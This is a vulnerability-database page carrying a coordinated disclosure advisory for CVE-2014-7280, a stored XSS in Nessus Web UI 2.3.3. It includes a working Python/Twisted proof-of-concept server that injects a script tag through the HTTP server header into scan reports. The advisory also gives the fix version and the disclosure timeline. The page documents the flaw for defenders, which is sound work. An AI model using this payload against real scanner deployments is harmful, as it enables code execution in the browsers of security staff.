Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:87306
HistoryOct 10, 2014 - 12:00 a.m.

Nessus Web UI 2.3.3 - Stored XSS

2014-10-1000:00:00
Root
www.seebug.org
20

0.007 Low

EPSS

Percentile

80.3%

JSON

No description provided by source.


                                                Nessus Web UI 2.3.3: Stored XSS
=========================================================
 
CVE number: CVE-2014-7280
Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html
Vendor advisory: http://www.tenable.com/security/tns-2014-08
 
-- Info --
 
Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. Tenable Network Security estimates that it is used by over 75,000 organisations worldwide.
 
-- Affected version -
 
Web UI version 2.3.3, Build #83
 
-- Vulnerability details --
 
By setting up a malicious web server that returns a specially crafted host header, an attacker is able to execute javascript code on the machine of the person performing a vulnerability scan of the web server. No escaping on javascript code is being performed when passing the server header to the affected Web UI version via a plugin.
The javascript code will be stored in the backend database, and will execute every time the target views a report that returns the server header.
 
-- POC --
 
#!/usr/bin/env python
import sys
from twisted.web import server, resource
from twisted.internet import reactor
from twisted.python import log
 
class Site(server.Site):
    def getResourceFor(self, request):
        request.setHeader('server', '<script>alert(1)</script>SomeServer')
        return server.Site.getResourceFor(self, request)
 
class HelloResource(resource.Resource):
    isLeaf = True
    numberRequests = 0
 
    def render_GET(self, request):
        self.numberRequests += 1
        request.setHeader("content-type", "text/plain")
return "theSecurityFactory Nessus POC"
 
log.startLogging(sys.stderr)
reactor.listenTCP(8080, Site(HelloResource()))
reactor.run()
 
-- Solution --
 
This issue has been fixed as of version 2.3.4 of the WEB UI.
 
 
-- Timeline --
 
2014-06-12   Release of Web UI version 2.3.3, build#83
 
2014-06-13        Vulnerability discovered and creation of POC
 
2014-06-13        Vulnerability responsibly reported to vendor
 
2014-06-13        Vulnerability acknowledged by vendor
 
2014-06-13        Release of Web UI version 2.3.4, build#85
 
2014-XX-XX        Advisory published in coordination with vendor
 
-- Credit --
 
Frank Lycops
Frank.lycops [at] thesecurityfactory.be

Related

cve 1
exploitpack 1
nessus 1
zdt 1
prion 1
packetstorm 1
cvelist 1
nvd 1
exploitdb 1
cve
cve
CVE-2014-7280
2014-10-21 15:55:07
exploitpack
exploitpack
Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting
2014-10-09 00:00:00
nessus
nessus
Nessus Web UI Scanned Content Stored XSS
2016-02-25 00:00:00
zdt
zdt
Nessus Web UI 2.3.3 Cross Site Scripting Vulnerability
2014-10-09 00:00:00
prion
prion
Cross site scripting
2014-10-21 15:55:00
packetstorm
packetstorm
Nessus Web UI 2.3.3 Cross Site Scripting
2014-10-07 00:00:00
cvelist
cvelist
CVE-2014-7280
2014-10-21 15:00:00
nvd
nvd
CVE-2014-7280
2014-10-21 15:55:07
exploitdb
exploitdb
Nessus Web UI 2.3.3 - Persistent Cross-Site Scripting
2014-10-09 00:00:00

0.007 Low

EPSS

Percentile

80.3%

JSON
Related for SSV:87306
cve1exploitpack1nessus1zdt1prion1packetstorm1cvelist1nvd1exploitdb1